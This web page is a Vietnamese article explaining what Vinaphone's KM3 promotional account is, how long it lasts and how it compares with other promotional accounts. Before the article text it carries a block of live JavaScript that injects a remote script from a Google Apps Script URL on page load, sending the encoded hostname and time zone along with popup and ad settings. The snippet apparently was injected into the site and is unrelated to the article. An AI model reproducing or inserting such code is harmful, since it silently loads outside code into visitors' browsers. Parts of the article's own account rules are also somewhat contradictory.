var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Tìm hiểu tài khoản KM3 Vinaphone là gì và dùng được bao lâu

Bạn đã biết rằng Vinaphone hiện đang cung cấp các gói khuyến mãi KM1, KM2 và KM3 dành cho những khách hàng đã sử dụng dịch vụ của Vinaphone trong thời gian dài. Vậy, gói KM3 của Vinaphone được sử dụng cho mục đích gì? Các gói này cho phép người dùng thực hiện cuộc gọi trong và ngoài mạng hoặc được hưởng các ưu đãi đặc biệt khác.

Tài khoản KM3 Vinaphone là gì?

Tài khoản KM3 Vinaphone là loại tài khoản phụ được sử dụng để gọi và nhắn tin cả trong nội mạng và ngoại mạng (Vinaphone, mạng cố định VNPT hoặc Mobifone). Để sử dụng tài khoản này, người dùng di động trả trước cần được cộng thêm ưu đãi và có thời gian sử dụng là 15 ngày.

Tài khoản KM3 Vinaphone là một chương trình khuyến mãi của nhà mạng Vinaphone, cho phép người dùng sử dụng dịch vụ di động với giá ưu đãi, cùng nhiều quyền lợi và phúc lợi khác.

Khi nạp thẻ từ 20% đến 50%, tài khoản KM3 của khách hàng sử dụng di động Vinaphone sẽ được cộng thêm.

Cách sử dụng tài khoản KM3 Vinaphone

Để có thể sử dụng tài khoản KM3 Vinaphone, người dùng cần đáp ứng những yêu cầu sau đây:

 • Sim trả trước của Vinaphone là loại thuê bao.
 • Sử dụng KM3 chỉ để gọi nội mạng của Vinaphone, còn VNPT và ngoại mạng cụ thể là Mobifone.
 • Cần đưa ra các giải pháp tiết kiệm và hợp lí để khách hàng chỉ có 15 ngày sử dụng tài khoản KM3 tính từ thời điểm nhận được tiền khuyến mãi. Nếu sử dụng quá thời hạn, tài khoản KM3 sẽ bị hủy bỏ tự động và không giữ lại khuyến mãi.
 • Để kiểm tra tình trạng tài khoản KM3 của Vinaphone, bạn có thể nhập các lệnh sau: *101# hoặc *111#.
 • Một số loại tài khoản khuyến mãi Vinaphone khác

  Người sử dụng điện thoại di động cần tìm hiểu các chương trình khuyến mãi khác đang được nhà mạng triển khai trong thời điểm hiện tại, đồng thời nắm rõ tài khoản KM3 của Vinaphone. Sau khi tìm hiểu đầy đủ các chương trình khuyến mãi, người dùng sẽ có cách sử dụng linh hoạt và tiết kiệm hợp lý.

  Tài khoản Hướng dẫn sử dụng Thời hạn dùng
  KM Gọi điện và nhắn tin nội và ngoại mạng Hạn dùng theo tài khoản chính
  KM1 Gọi điện và nhắn tin nội mạng Vinaphone, ngoại mạng Mobifone và cố định VNPT Hạn dùng theo tài khoản chính
  KM2 Gọi điện và nhắn tin nội mạng Vinaphone và cố định VNPT Hạn dùng theo tài khoản chính
  KM4 Gọi điện và nhắn tin nội mạng Vinaphone, ngoại mạng Mobifone và cố định VNPT 15 ngày kể từ ngày nhận khuyến mãi
  DK1 Gọi điện và nhắn tin nội mạng Vinaphone, ngoại mạng Mobifone và cố định VNPT Hạn dùng theo tài khoản chính
  DK2 Gọi điện và nhắn tin nội mạng Vinaphone và cố định VNPT Sử dụng trong 30 ngày

  Gửi đến quý độc giả, bài viết chia sẻ thông tin và cách sử dụng tài khoản KM3 Vinaphone. Hi vọng rằng, quý khách sẽ lựa chọn sử dụng tiết kiệm nhất cho thuê bao di động thông qua những dòng chia sẻ ngắn gọn, dễ hiểu trên. Vinaphone mong muốn quý khách có một ngày làm việc hiệu quả!